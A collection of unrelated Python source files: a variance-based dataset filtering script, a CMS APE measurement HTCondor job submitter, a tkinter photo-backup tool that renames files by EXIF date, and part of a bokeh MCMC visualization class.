computed_var = np.load(args.var_file)
preload = np.load(args.preload)
# take the max variance out of steer, throtte and brake
max_var = np.max(computed_var, axis=1)
print (max_var.shape)
indices_var = np.argsort(max_var)
required_var = max_var[indices_var[::-1]]
threshold_index = 72507 # this is selected based on the proportion of data to be sampled in the first iteration
threshold_var = required_var[threshold_index]
print (threshold_var)
new_preload = preload[0][indices_var[::-1]]
required_preload = new_preload[:threshold_index]
required_episodes = {}
for i in range(len(required_preload)):
curr_episode, curr_frame = required_preload[i].split('/')
if curr_episode in required_episodes:
required_episodes[curr_episode].append(curr_frame)
else:
required_episodes[curr_episode] = [curr_frame]
print (len(required_episodes))
return required_episodes
# once the threshold is fixed after the first iteration, use this function for sampling
def get_required_episodes_thres():
computed_var = np.load(args.var_file)
preload = np.load(args.preload)
max_var = np.max(computed_var, axis=1)
thres = 0.00963
required_preload = preload[0][max_var>thres]
'''
#indices_var = np.argsort(max_var)
#required_var = max_var[indices_var[::-1]]
#threshold_index = 72507
#threshold_var = required_var[threshold_index]
#print (threshold_var)
#new_preload = preload[0][indices_var[::-1]]
#required_preload = new_preload[:threshold_index]
#print (required_preload)
'''
required_episodes = {}
for i in range(len(required_preload)):
curr_episode, curr_frame = required_preload[i].split('/')
if curr_episode in required_episodes:
required_episodes[curr_episode].append(curr_frame)
else:
required_episodes[curr_episode] = [curr_frame]
print (len(required_episodes))
return required_episodes
def main():
manager = multiprocessing.Manager()
return_dict = manager.dict()
jobs = []
if not os.path.isdir(args.target_dir):
os.mkdir(args.target_dir)
# episodes_dict = get_required_episodes() # this is used for the first iteration
episodes_dict = get_required_episodes_thres() # this is used for the sunsequent iteration
# if 'metadata.json' in episodes_list:
# shutil.copy2(os.path.join(source_dir, 'metadata.json'), os.path.join(target_dir, 'metadata.json'))
st = time.time()
for episode in episodes_dict:
print ('episode: ', episode)
p = multiprocessing.Process(target=filter_episode, args=(episode, episodes_dict[episode]))
jobs.append(p)
p.start()
for process in jobs:
process.join()
print ('time for processing episodes: ', time.time()-st)
for episode in episodes_dict:
print (episode, len(episodes_dict[episode]))
if __name__ == '__main__':
global args
parser = argparse.ArgumentParser()
parser.add_argument('--source_dir', type=str, required=True, help='source directory')
parser.add_argument('--target_dir', type=str, required=True, help='target directory')
parser.add_argument('--preload', type=str, required=True, help='preload path of required dataset')
parser.add_argument('--var_file', type=str, required=True, help='path of variance file')
args = parser.parse_args()
main()
|
autoSubmitter.py
|
from __future__ import print_function
import configparser as ConfigParser
import argparse
import shelve
import sys
import os
import subprocess
import threading
import shutil
import time
import re
from helpers import *
shelve_name = "dump.shelve" # contains all the measurement objects
history_file = "history.log"
clock_interval = 20 # in seconds
delete_logs_after_finish = False # if it is not desired to keep the log and submit script files
use_caf = False
def save(name, object):
# in case of multiple threads running this stops potentially problematic file access
global lock
lock.acquire()
try:
sh = shelve.open(shelve_name)
sh[name] = object
sh.close()
finally:
lock.release()
class Dataset:
name = ""
nFiles = 0
maxEvents = -1
baseDirectory = ""
sampleType = "data1"
fileList = []
conditions = []
def __init__(self, config, name):
dsDict = dict(config.items("dataset:{}".format(name)))
self.name = name
self.baseDirectory = dsDict["baseDirectory"]
self.fileList = []
names = dsDict["fileNames"].split(" ")
for name in names:
parsedNames = replaceAllRanges(name)
for fileName in parsedNames:
self.fileList.append(self.baseDirectory+"/"+fileName)
self.nFiles = len(self.fileList)
if "maxEvents" in dsDict:
self.maxEvents = int(dsDict["maxEvents"])
if "isMC" in dsDict:
if dsDict["isMC"] == "True":
self.sampleType = "MC"
else:
self.sampleType ="data1"
if "isCosmics" in dsDict:
self.isCosmics = (dsDict["isCosmics"] == "True")
else:
self.isCosmics = False
self.conditions, dummy, self.validConditions = loadConditions(dsDict)
# check if any of the sources used for conditions is invalid
if not self.validConditions:
print("Invalid conditions defined for dataset {}".format(self.name))
# check if all files specified exist
self.existingFiles, missingFiles = allFilesExist(self)
if not self.existingFiles:
for fileName in missingFiles:
print("Invalid file name {} defined for dataset {}".format(fileName, self.name))
class Alignment:
name = ""
alignmentName = None
baselineDir = "Design"
globalTag = "None"
isDesign = False
hasAlignmentCondition = False
conditions = []
def __init__(self, config, name):
alDict = dict(config.items("alignment:{}".format(name)))
self.name = name
if "alignmentName" in alDict:
self.alignmentName = alDict["alignmentName"]
if "globalTag" in alDict:
self.globalTag = alDict["globalTag"]
if "baselineDir" in alDict:
self.baselineDir= alDict["baselineDir"]
if "isDesign" in alDict:
self.isDesign= (alDict["isDesign"] == "True")
# If self.hasAlignmentCondition is true, no other Alignment-Object is loaded in apeEstimator_cfg.py using the alignmentName
self.conditions, self.hasAlignmentCondition, self.validConditions = loadConditions(alDict)
# check if any of the sources used for conditions is invalid
if not self.validConditions:
print("Invalid conditions defined for alignment {}".format(self.name))
# check if at least one of the two ways to define the alignment was used
if self.alignmentName == None and not self.hasAlignmentCondition:
print("Error: No alignment object name or record was defined for alignment {}".format(self.name))
sys.exit()
class ApeMeasurement:
name = "workingArea"
curIteration = 0
firstIteration = 0
maxIterations = 15
maxEvents = None
status = STATE_NONE
dataset = None
alignment = None
runningJobs = None
failedJobs = None
startTime = ""
finishTime = ""
def __init__(self, name, config, settings):
self.name = name
self.status = STATE_ITERATION_START
self.runningJobs = []
self.failedJobs = []
self.startTime = subprocess.check_output(["date"]).strip()
# load conditions from dictionary, overwrite defaults if defined
for key, value in settings.items():
if not key.startswith("condition "):
setattr(self, key, value)
# Replace names with actual Dataset and Alignment objects
# In principle, one could preload all these once so they are not
# redefined for each measurement, but right now this does not
# seem necessary
self.dataset = Dataset(config, settings["dataset"])
self.alignment = Alignment(config, settings["alignment"])
# If not defined here, replace by setting from Dataset
if not "maxEvents" in settings:
self.maxEvents = self.dataset.maxEvents
self.firstIteration=int(self.firstIteration)
self.maxIterations=int(self.maxIterations)
self.curIteration = self.firstIteration
self.maxEvents = int(self.maxEvents)
if self.alignment.isDesign:
self.maxIterations = 0
self.conditions, dummy, self.validConditions = loadConditions(settings)
# see if sanity checks passed
if not self.alignment.validConditions or not self.dataset.validConditions or not self.dataset.existingFiles or not self.validConditions:
self.status = STATE_INVALID_CONDITIONS
self.print_status()
self.finishTime = subprocess.check_output(["date"]).strip()
return
if self.alignment.isDesign and self.dataset.sampleType != "MC":
# For now, this won't immediately shut down the program
print("APE Measurement {} is scheduled to to an APE baseline measurement with a dataset that is not marked as isMC=True. Is this intended?".format(self.name))
ensurePathExists('{}/hists/{}'.format(base, self.name))
if not self.alignment.isDesign:
ensurePathExists('{}/hists/{}/apeObjects'.format(base, self.name))
def get_status(self):
return status_map[self.status]
def print_status(self):
print("APE Measurement {} in iteration {} is now in status {}".format(self.name, self.curIteration, self.get_status()))
# submit jobs for track refit and hit categorization
def submit_jobs(self):
toSubmit = []
allConditions = self.alignment.conditions+self.dataset.conditions+self.conditions
allConditions = list({v['record']:v for v in allConditions}.values()) # should we clean for duplicate records? the record last defined (from dataset)
# will be kept in case of overlap, which is the same as if there was no overlap removal
ensurePathExists("{}/test/autoSubmitter/workingArea".format(base))
# If conditions are made, create file to load them from
rawFileName = "None"
conditionsFileName = "None"
if len(allConditions) > 0:
conditionsFileName = "{base}/python/conditions/conditions_{name}_iter{iterNo}_cff.py".format(base=base,name=self.name, iterNo=self.curIteration)
rawFileName = "conditions_{name}_iter{iterNo}_cff".format(name=self.name, iterNo=self.curIteration)
with open(conditionsFileName, "w") as fi:
from autoSubmitterTemplates import conditionsFileHeader
fi.write(conditionsFileHeader)
from autoSubmitterTemplates import conditionsTemplate
for condition in allConditions:
fi.write(conditionsTemplate.format(record=condition["record"], connect=condition["connect"], tag=condition["tag"]))
alignmentNameToUse = self.alignment.alignmentName
if self.alignment.hasAlignmentCondition:
alignmentNameToUse = "fromConditions"
lastIter = (self.curIteration==self.maxIterations) and not self.alignment.isDesign
inputCommands = "sample={sample} fileNumber={fileNo} iterNumber={iterNo} lastIter={lastIter} alignRcd={alignRcd} maxEvents={maxEvents} globalTag={globalTag} measurementName={name} conditions={conditions} cosmics={cosmics}".format(sample=self.dataset.sampleType,fileNo="$1",iterNo=self.curIteration,lastIter=lastIter,alignRcd=alignmentNameToUse, maxEvents=self.maxEvents, globalTag=self.alignment.globalTag, name=self.name, conditions=rawFileName,cosmics=self.dataset.isCosmics)
from autoSubmitterTemplates import condorJobTemplate
jobFileContent = condorJobTemplate.format(base=base, inputFile="$2", inputCommands=inputCommands)
jobFileName = "{}/test/autoSubmitter/workingArea/batchscript_{}_iter{}.tcsh".format(base, self.name,self.curIteration)
with open(jobFileName, "w") as jobFile:
jobFile.write(jobFileContent)
# create a batch job file for each input file
arguments = ""
from autoSubmitterTemplates import condorArgumentTemplate
for i in range(self.dataset.nFiles):
inputFile = self.dataset.fileList[i]
fileNumber = i+1
arguments += condorArgumentTemplate.format(fileNumber=fileNumber, inputFile=inputFile)
# build condor submit script
date = subprocess.check_output(["date", "+%m_%d_%H_%M_%S"]).strip()
sub = "{}/test/autoSubmitter/workingArea/job_{}_iter{}".format(base, self.name, self.curIteration)
errorFileTemp = sub+"_error_{}.txt"
errorFile = errorFileTemp.format("$(ProcId)")
outputFile = sub+"_output_$(ProcId).txt"
logFileTemp= sub+"_condor_{}.log"
logFile = logFileTemp.format("$(ProcId)")
jobFile = sub+".tcsh"
jobName = "{}_{}".format(self.name, self.curIteration)
for i in range(self.dataset.nFiles):
# make file empty if it existed before
with open(logFileTemp.format(i), "w") as fi:
pass
# create submit file
from autoSubmitterTemplates import condorSubTemplate
from autoSubmitterTemplates import condorSubTemplateCAF
if use_caf:
submitFileContent = condorSubTemplateCAF.format(jobFile=jobFileName, outputFile=outputFile, errorFile=errorFile, logFile=logFile, arguments=arguments, jobName=jobName)
else:
submitFileContent = condorSubTemplate.format(jobFile=jobFileName, outputFile=outputFile, errorFile=errorFile, logFile=logFile, arguments=arguments, jobName=jobName)
submitFileName = "{}/test/autoSubmitter/workingArea/submit_{}_jobs_iter{}.sub".format(base, self.name, self.curIteration)
with open(submitFileName, "w") as submitFile:
submitFile.write(submitFileContent)
# submit batch
from autoSubmitterTemplates import submitCondorTemplate
subOut = subprocess.check_output(submitCondorTemplate.format(subFile=submitFileName), shell=True).strip()
if len(subOut) == 0:
print("Running on environment that does not know bsub command or ssh session is timed out (ongoing for longer than 24h?), exiting")
sys.exit()
cluster = subOut.split(" ")[-1][:-1]
for i in range(self.dataset.nFiles):
# list contains condor log files from which to read when job is terminated to detect errors
self.runningJobs.append((logFileTemp.format(i), errorFileTemp.format(i), "{}.{}".format(cluster, i)))
self.status = STATE_BJOBS_WAITING
self.print_status()
def check_jobs(self):
lastStatus = self.status
stillRunningJobs = []
# check all still running jobs
for logName, errName, jobId in self.runningJobs:
# read condor logs instead of doing condor_q or similar, as it is much faster
if not os.path.isfile(logName):
print("{} does not exist even though it should, marking job as failed".format(logName))
self.failedJobs.append( (logName, errName) )
break
with open(logName, "r") as logFile:
log = logFile.read()
if not "submitted" in log:
print("{} was apparently not submitted, did you empty the log file or is condor not working?".format(jobId))
self.failedJobs.append( (logName, errName) )
if "Job was aborted" in log:
print("Job {} of measurement {} in iteration {} was aborted".format(jobId, self.name, self.curIteration))
self.failedJobs.append( (logName, errName) )
elif "Job terminated" in log:
if "Normal termination (return value 0)" in log:
foundErr = False
with open(errName, "r") as err:
for line in err:
if "Fatal Exception" in line.strip():
foundErr = True
break
if not foundErr:
print("Job {} of measurement {} in iteration {} finished successfully".format(jobId, self.name, self.curIteration))
else:
# Fatal error in stderr
print("Job {} of measurement {} in iteration {} has a fatal error, check stderr".format(jobId, self.name, self.curIteration))
self.failedJobs.append( (logName, errName) )
else:
# nonzero return value
print("Job {} of measurement {} in iteration {} failed, check stderr".format(jobId, self.name, self.curIteration))
self.failedJobs.append( (logName, errName) )
else:
stillRunningJobs.append( (logName, errName, jobId) )
self.runningJobs = stillRunningJobs
# at least one job failed
if len(self.failedJobs) > 0:
self.status = STATE_BJOBS_FAILED
self.finishTime = subprocess.check_output(["date"]).strip()
elif len(self.runningJobs) == 0:
self.status = STATE_BJOBS_DONE
print("All condor jobs of APE measurement {} in iteration {} are done".format(self.name, self.curIteration))
# remove files
if delete_logs_after_finish:
submitFile = "{}/test/autoSubmitter/workingArea/submit_{}_jobs_iter{}.sub".format(base, self.name, self.curIteration)
jobFile = "{}/test/autoSubmitter/workingArea/batchscript_{}_iter{}.tcsh".format(base, self.name,self.curIteration)
os.remove(submitFile)
os.remove(jobFile)
for i in range(self.dataset.nFiles):
sub = "{}/test/autoSubmitter/workingArea/job_{}_iter{}".format(base, self.name, self.curIteration)
errorFile = sub+"_error_{}.txt".format(i)
outputFile = sub+"_output_{}.txt".format(i)
logFile = sub+"_condor_{}.log".format(i)
os.remove(errorFile)
os.remove(outputFile)
os.remove(logFile)
if lastStatus != self.status:
self.print_status()
# merges files from jobs
def do_merge(self):
self.status = STATE_MERGE_WAITING
if self.alignment.isDesign:
folderName = '{}/hists/{}/baseline'.format(base, self.name)
else:
folderName = '{}/hists/{}/iter{}'.format(base, self.name, self.curIteration)
# (re)move results from previous measurements before creating folder
if os.path.isdir(folderName):
if os.path.isdir(folderName+"_old"):
shutil.rmtree("{}_old".format(folderName))
os.rename(folderName, folderName+"_old")
os.makedirs(folderName)
# This is so that the structure of the tree can be retrieved by ApeEstimatorSummary.cc and the tree does not have to be rebuilt
if self.curIteration > 0 and not self.alignment.isDesign: # don't have to check for isDesign here because it always ends after iteration 0...
shutil.copyfile('{}/hists/{}/iter{}/allData_iterationApe.root'.format(base, self.name, self.curIteration-1),folderName+"/allData_iterationApe.root")
fileNames = ['{}/hists/{}/{}{}.root'.format(base, self.name, self.dataset.sampleType, str(i)) for i in range(1, self.dataset.nFiles+1)]
fileString = " ".join(fileNames)
from autoSubmitterTemplates import mergeTemplate
merge_result = subprocess.call(mergeTemplate.format(path=folderName, inputFiles=fileString), shell=True) # returns exit code (0 if no error occured)
for name in fileNames:
os.remove(name)
if rootFileValid("{}/allData.root".format(folderName)) and merge_result == 0:
self.status = STATE_MERGE_DONE
else:
self.status = STATE_MERGE_FAILED
self.finishTime = subprocess.check_output(["date"]).strip()
self.print_status()
# calculates APE
def do_summary(self):
self.status = STATE_SUMMARY_WAITING
from autoSubmitterTemplates import summaryTemplate
if self.alignment.isDesign:
#use measurement name as baseline folder name in this case
inputCommands = "iterNumber={} setBaseline={} measurementName={} baselineName={}".format(self.curIteration,self.alignment.isDesign,self.name, self.name)
else:
inputCommands = "iterNumber={} setBaseline={} measurementName={} baselineName={}".format(self.curIteration,self.alignment.isDesign,self.name, self.alignment.baselineDir)
summary_result = subprocess.call(summaryTemplate.format(inputCommands=inputCommands), shell=True) # returns exit code (0 if no error occured)
if summary_result == 0:
self.status = STATE_SUMMARY_DONE
else:
self.status = STATE_SUMMARY_FAILED
self.finishTime = subprocess.check_output(["date"]).strip()
self.print_status()
# saves APE to .db file so it can be read out next iteration
def do_local_setting(self):
self.status = STATE_LOCAL_WAITING
from autoSubmitterTemplates import localSettingTemplate
inputCommands = "iterNumber={} setBaseline={} measurementName={}".format(self.curIteration,self.alignment.isDesign,self.name)
local_setting_result = subprocess.call(localSettingTemplate.format(inputCommands=inputCommands), shell=True) # returns exit code (0 if no error occured)
if local_setting_result == 0:
self.status = STATE_LOCAL_DONE
else:
self.status = STATE_LOCAL_FAILED
self.finishTime = subprocess.check_output(["date"]).strip()
self.print_status()
def finish_iteration(self):
print("APE Measurement {} just finished iteration {}".format(self.name, self.curIteration))
if self.curIteration < self.maxIterations:
self.curIteration += 1
self.status = STATE_ITERATION_START
else:
self.status = STATE_FINISHED
self.finishTime = subprocess.check_output(["date"]).strip()
print("APE Measurement {}, which was started at {} was finished after {} iterations, at {}".format(self.name, self.startTime, self.curIteration, self.finishTime))
def kill(self):
from autoSubmitterTemplates import killJobTemplate
for log, err, jobId in self.runningJobs:
subprocess.call(killJobTemplate.format(jobId=jobId), shell=True)
self.runningJobs = []
self.status = STATE_NONE
def purge(self):
self.kill()
folderName = '{}/hists/{}'.format(base, self.name)
shutil.rmtree(folderName)
# remove log-files as well?
def run_iteration(self):
global threadcounter
global measurements
threadcounter.acquire()
try:
if self.status == STATE_ITERATION_START:
# start bjobs
print("APE Measurement {} just started iteration {}".format(self.name, self.curIteration))
try:
self.submit_jobs()
save("measurements", measurements)
except Exception as e:
# this is needed in case the scheduler goes down
print("Error submitting jobs for APE measurement {}".format(self.name))
print(e)
return
if self.status == STATE_BJOBS_WAITING:
# check if bjobs are finished
self.check_jobs()
save("measurements", measurements)
if self.status == STATE_BJOBS_DONE:
# merge files
self.do_merge()
save("measurements", measurements)
if self.status == STATE_MERGE_DONE:
# start summary
self.do_summary()
save("measurements", measurements)
if self.status == STATE_SUMMARY_DONE:
# start local setting (only if not a baseline measurement)
if self.alignment.isDesign:
self.status = STATE_LOCAL_DONE
else:
self.do_local_setting()
save("measurements", measurements)
if self.status == STATE_LOCAL_DONE:
self.finish_iteration()
save("measurements", measurements)
# go to next iteration or finish measurement
if self.status == STATE_BJOBS_FAILED or \
self.status == STATE_MERGE_FAILED or \
self.status == STATE_SUMMARY_FAILED or \
self.status == STATE_LOCAL_FAILED or \
self.status == STATE_INVALID_CONDITIONS or \
self.status == STATE_FINISHED:
with open(history_file, "a") as fi:
fi.write("APE measurement {name} which was started at {start} finished at {end} with state {state} in iteration {iteration}\n".format(name=self.name, start=self.startTime, end=self.finishTime, state=self.get_status(), iteration=self.curIteration))
if self.status == STATE_FINISHED:
global finished_measurements
finished_measurements[self.name] = self
save("finished", finished_measurements)
else:
global failed_measurements
failed_measurements[self.name] = self
self.status = STATE_NONE
save("failed", failed_measurements)
save("measurements", measurements)
if self.status == STATE_ITERATION_START: # this ensures that jobs do not go into idle if many measurements are done simultaneously
# start bjobs
print("APE Measurement {} just started iteration {}".format(self.name, self.curIteration))
self.submit_jobs()
save("measurements", measurements)
finally:
threadcounter.release()
def main():
parser = argparse.ArgumentParser(description="Automatically run APE measurements")
parser.add_argument("-c", "--config", action="append", dest="configs", default=[],
help="Config file that has list of measurements")
parser.add_argument("-k", "--kill", action="append", dest="kill", default=[],
help="List of measurement names to kill (=remove from list and kill all bjobs)")
parser.add_argument("-p", "--purge", action="append", dest="purge", default=[],
help="List of measurement names to purge (=kill and remove folder)")
parser.add_argument("-r", "--resume", action="append", dest="resume", default=[],
help="Resume interrupted APE measurements which are stored in shelves (specify shelves)")
parser.add_argument("-d", "--dump", action="store", dest="dump", default=None,
help='Specify in which .shelve file to store the measurements')
parser.add_argument("-n", "--ncores", action="store", dest="ncores", default=1, type=int,
help='Number of threads running in parallel')
parser.add_argument("-C", "--caf",action="store_true", dest="caf", default=False,
help="Use CAF queue for condor jobs")
args = parser.parse_args()
global base
global clock_interval
global shelve_name
global threadcounter
global lock
global use_caf
use_caf = args.caf
enableCAF(use_caf)
threadcounter = threading.BoundedSemaphore(args.ncores)
lock = threading.Lock()
if args.dump != None: # choose different file than default
shelve_name = args.dump
elif args.resume != []:
shelve_name = args.resume[0]
try:
base = os.environ['CMSSW_BASE']+"/src/Alignment/APEEstimation"
except KeyError:
print("No CMSSW environment was set, exiting")
sys.exit()
killTargets = []
purgeTargets = []
for toConvert in args.kill:
killTargets += replaceAllRanges(toConvert)
for toConvert in args.purge:
purgeTargets += replaceAllRanges(toConvert)
global measurements
measurements = []
global finished_measurements
finished_measurements = {}
global failed_measurements
failed_measurements = {}
if args.resume != []:
for resumeFile in args.resume:
try:
sh = shelve.open(resumeFile)
resumed = sh["measurements"]
resumed_failed = sh["failed"]
resumed_finished = sh["finished"]
sh.close()
for res in resumed:
measurements.append(res)
print("Measurement {} in state {} in iteration {} was resumed".format(res.name, res.get_status(), res.curIteration))
# Killing and purging is done here, because it doesn't make
# sense to kill or purge a measurement that was just started
for to_kill in args.kill:
if res.name == to_kill:
res.kill()
for to_purge in args.purge:
if res.name == to_purge:
res.purge()
failed_measurements.update(resumed_failed)
finished_measurements.update(resumed_finished)
except IOError:
print("Could not resume because {} could not be opened, exiting".format(shelve_name))
sys.exit()
# read out from config file
if args.configs != []:
config = ConfigParser.RawConfigParser()
config.optionxform = str
config.read(args.configs)
# read measurement names
meas = [str(x.split("ape:")[1]) for x in list(config.keys()) if x.startswith("ape:")]
for name in meas:
if name in [x.name for x in measurements]:
print("Error: APE Measurement with name {} already exists, skipping".format(name))
continue
settings = dict(config.items("ape:{}".format(name)))
measurement = ApeMeasurement(name, config, settings)
if measurement.status >= STATE_ITERATION_START and measurement.status <= STATE_FINISHED:
measurements.append(measurement)
print("APE Measurement {} was started".format(measurement.name))
while True:
# remove finished and failed measurements
measurements = [measurement for measurement in measurements if not (measurement.status==STATE_NONE or measurement.status == STATE_FINISHED)]
save("measurements", measurements)
save("failed", failed_measurements)
save("finished", finished_measurements)
list_threads = []
for measurement in measurements:
t = threading.Thread(target=measurement.run_iteration)
list_threads.append(t)
t.start()
# wait for iterations to finish
for t in list_threads:
t.join()
if len(measurements) == 0:
print("No APE measurements are active, exiting")
break
try: # so that interrupting does not give an error message and just ends the program
time_remaining = clock_interval
while time_remaining > 0:
print("Sleeping for {} seconds, you can safely [CTRL+C] now".format(time_remaining))
time.sleep(1)
time_remaining -= 1
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
print("")
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
except KeyboardInterrupt:
sys.exit(0)
if __name__ == "__main__":
main()
|
backup.py
|
import tkinter as tk
from tkinter import filedialog
import shutil
import os.path
import time
import datetime
from subprocess import Popen, PIPE
from threading import Thread
from PIL import Image
from PIL.ExifTags import TAGS
def mv(src, dest):
num = 1
if os.path.exists(dest):
parts = list(os.path.splitext(dest))
filename = parts[0]
while os.path.exists(dest):
parts[0] = '{}-{}'.format(filename, num)
dest = ''.join(parts)
num += 1
shutil.move(src, dest)
def get_exif_data(filename):
"""Get embedded EXIF data from image file.
Source: <a href="http://www.endlesslycurious.com/2011/05/11/extracting-image-">
http://www.endlesslycurious.com/2011/05/11/extractexif-data-with-python/</a>
"""
ret = {}
try:
img = Image.open(filename)
if hasattr(img, '_getexif'):
exif_info = img._getexif()
if exif_info is not None:
for tag, value in list(exif_info.items()):
decoded = TAGS.get(tag, tag)
ret[decoded] = value
except IOError:
print('IOERROR ' + filename)
return ret
def get_m_timestamp(filename):
modified = os.path.getmtime(filename)
accessed = os.path.getatime(filename)
created = os.path.getctime(filename)
t = min(modified, accessed, created)
return datetime.datetime.fromtimestamp(t)
def get_timestamp(filename):
exif_info = get_exif_data(filename)
if 'DateTimeOriginal' in exif_info:
datestring = exif_info['DateTimeOriginal']
return datetime.datetime.strptime(datestring, '%Y:%m:%d %H:%M:%S')
else:
return datetime.datetime.fromtimestamp((os.path.getctime(filename)))
def get_size(f):
ps = Popen('du -sh {}'.format(f), shell=True, stdout=PIPE, stderr=PIPE)
output = ps.stdout.readlines()[0].strip()
size = output.split()[0]
return size
def progress(source, target):
print('calculating progress')
while True:
time.sleep(10)
if os.path.exists(source) and os.path.exists(target):
print('{}/{}'.format(get_size(target), get_size(source)))
else:
pass
def get_original_filename(path):
return os.path.split(os.path.splitext(path)[0])[-1]
def should_ignore(cur_dir, items):
items_to_ignore = []
if 'cache' in items:
items_to_ignore.append('cache')
thumbnails = [x for x in items if x.endswith('.thumbnail')]
if thumbnails:
items_to_ignore.extend(thumbnails)
return items_to_ignore
def get_defaults():
default_arguments = {}
default_dest = '/media/fruitschen/新加卷/小树照片temp'
if os.path.exists(default_dest):
default_arguments.update({
'default_dest': default_dest,
})
possible_default_froms = [
'/media/fruitschen/EOS_DIGITAL/DCIM/100CANON',
]
for i in range(10):
phone = '/run/user/1000/gvfs/mtp:host=%5Busb%3A003%2C00{}%5D/内部存储/DCIM/Camera'.format(i)
possible_default_froms.append(phone)
for default_from in possible_default_froms:
if os.path.exists(default_from):
default_arguments.update({
'default_from': default_from,
})
return default_arguments
def do_backup(source, target, append_timestamp):
temp_target_dir = os.path.join(target, 'temp_backup')
print('Backup in progress')
t = Thread(target=progress, args=(source, temp_target_dir))
t.start()
shutil.copytree(source, temp_target_dir, ignore=should_ignore)
t.join(timeout=1)
print('Backup done. ')
print('Processing files')
results_by_month = {}
for root, dirs, files in os.walk(temp_target_dir):
photos = [x for x in files if '.jpg' in x.lower()]
for f in photos:
photo_path = os.path.join(root, f)
timestamp = get_timestamp(photo_path)
original_filename = get_original_filename(photo_path)
extra = ''
if append_timestamp:
extra = original_filename
desired_filename = 'IMG_{}{}.jpg'.format(timestamp.strftime('%Y-%m-%d-%H%M%S'), extra)
file_month = timestamp.strftime('%Y-%m')
file_date = timestamp.strftime('%Y-%m-%d')
result = {
'file': photo_path,
'type': 'photo',
'created': get_timestamp(photo_path),
'file_date': file_date,
'desired_filename': desired_filename,
}
if file_month in results_by_month:
pass
else:
results_by_month[file_month] = []
results_by_month[file_month].append(result)
video_formats = ['.avi', '.mp4', '.mts']
videos = [x for x in files if os.path.splitext(x.lower())[1] in video_formats]
for f in videos:
video_path = os.path.join(root, f)
ext = os.path.splitext(video_path)[-1]
timestamp = get_m_timestamp(video_path)
original_filename = get_original_filename(video_path)
extra = ''
if append_timestamp:
extra = original_filename
desired_filename = 'video_{}{}{}'.format(timestamp.strftime('%Y-%m-%d-%H%M%S'), extra, ext)
file_month = timestamp.strftime('%Y-%m')
file_date = timestamp.strftime('%Y-%m-%d')
result = {
'file': video_path,
'type': 'video',
'created': timestamp,
'file_date': file_date,
'desired_filename': desired_filename,
}
if file_month in results_by_month:
pass
else:
results_by_month[file_month] = []
results_by_month[file_month].append(result)
photos_count = 0
videos_count = 0
for month, results in list(results_by_month.items()):
month_photos_count = 0
month_videos_count = 0
print('Processing for {}'.format(month))
print('{} files'.format(len(results)))
month_dir = os.path.join(temp_target_dir, month)
if not os.path.exists(month_dir):
os.makedirs(month_dir)
for result in results:
file_date = result['file_date']
date_dir = os.path.join(month_dir, file_date)
if not os.path.exists(date_dir):
os.makedirs(date_dir)
desired_path = os.path.join(date_dir, result['desired_filename'])
mv(result['file'], desired_path)
if result['type'] == 'photo':
photos_count += 1
month_photos_count += 1
if result['type'] == 'video':
videos_count += 1
month_videos_count += 1
print('{} photos'.format(len(results)))
print('{} videos'.format(len(results)))
print()
os.rename(temp_target_dir, temp_target_dir.replace('temp_backup', 'backup_{}'.format(
datetime.datetime.now().strftime('%Y-%m-%d-%H%M'))))
print('Done processing photos')
print('{} photos in total'.format(photos_count))
print('{} videos in total'.format(videos_count))
class Application(tk.Frame):
def __init__(self, master=None):
super().__init__(master)
self.master = master
self.pack()
self.default_arguments = get_defaults()
self.from_dir = self.default_arguments.get('default_from', '')
self.dest_dir = self.default_arguments.get('default_dest', '')
self.create_widgets()
def create_widgets(self):
self.from_dir_button = tk.Button(self)
self.from_dir_button["text"] = "From:\n {}\n(click me to change)".format(self.from_dir, )
self.from_dir_button["command"] = self.update_from_dir
self.from_dir_button.pack(side="top")
self.dest_dir_button = tk.Button(self)
self.dest_dir_button["text"] = "To: \n{}\n(click me to change)".format(self.dest_dir, )
self.dest_dir_button["command"] = self.update_dest_dir
self.dest_dir_button.pack(side="top")
self.append_timestamp_val = tk.BooleanVar()
self.append_timestamp = False
self.append_widget = tk.Checkbutton(
self, text='append timestamp and keep original filename',
command=self.append_timestamp_changed, variable=self.append_timestamp_val,
onvalue=True, offvalue=False)
self.append_widget.pack(side="top")
self.backup_button = tk.Button(self, text='Backup', fg='blue', command=self.backup)
self.backup_button.pack(side="top")
self.quit = tk.Button(self, text="QUIT", fg="red",
command=self.master.destroy)
self.quit.pack(side="top")
def update_from_dir(self):
value = filedialog.askdirectory(initialdir = self.from_dir, title = "From Directory")
if value:
self.from_dir = value
self.from_dir_button["text"] = "From {}\n(click me to change)".format(self.from_dir, )
print("From Directory Changed: {}!".format(self.from_dir))
def update_dest_dir(self):
value = filedialog.askdirectory(initialdir = self.dest_dir, title = "From Directory")
if value:
self.dest_dir = value
self.dest_dir_button["text"] = "From {}\n(click me to change)".format(self.dest_dir, )
print("To Directory Changed: {}!".format(self.dest_dir))
def append_timestamp_changed(self):
value = self.append_timestamp_val.get()
self.append_timestamp = value
print('append_timestamp_changed: {}'.format(value))
def backup(self):
do_backup(self.from_dir, self.dest_dir, self.append_timestamp)
if __name__ == '__main__':
root = tk.Tk()
app = Application(master=root)
app.master.title("Backup")
app.master.maxsize(1000, 400)
app.mainloop()
|
variable_cell.py
|
from ..interfaces.cell import Cell
from ..utils.stats import find_x_range
from ..utils.constants import BORDER_COLORS
from bokeh.models import Toggle, Div
import numpy as np
import threading
from abc import abstractmethod
class VariableCell(Cell):
def __init__(self, name, control):
"""
Parameters:
--------
name A String within the set {"<variableName>"}.
control A Control object
Sets:
-----
x_range Figures axes x_range
"""
self.source = {}
self.samples = {}
self._all_samples = {}
self.x_range = {}
Cell.__init__(self, name, control)
self._toggle = {}
self._div = {}
self._initialize_toggle_div()
## DATA
def get_samples(self, space):
"""
Retrieves MCMC samples of <space> into a numpy.ndarray and
sets an entry into self._all_samples Dict.
"""
space_gsam = space
if self._data.get_var_type(self.name) == "observed":
if space == "posterior" and "posterior_predictive" in self._data.get_spaces():
space_gsam = "posterior_predictive"
elif space == "prior" and "prior_predictive" in self._data.get_spaces():
space_gsam = "prior_predictive"
self._all_samples[space] = self._data.get_samples(self.name, space_gsam).T
# compute x_range
self.x_range[space] = find_x_range(self._all_samples[space])
def get_data_for_cur_idx_dims_values(self, space):
"""
Returns a numpy.ndarray of the MCMC samples of the <name>
parameter for current index dimensions values.
Returns:
--------
A numpy.ndarray.
"""
if space in self._all_samples:
data = self._all_samples[space]
else:
raise ValueError
for dim_name, dim_value in self.cur_idx_dims_values.items():
data = data[dim_value]
return np.squeeze(data).T
## INITIALIZATION
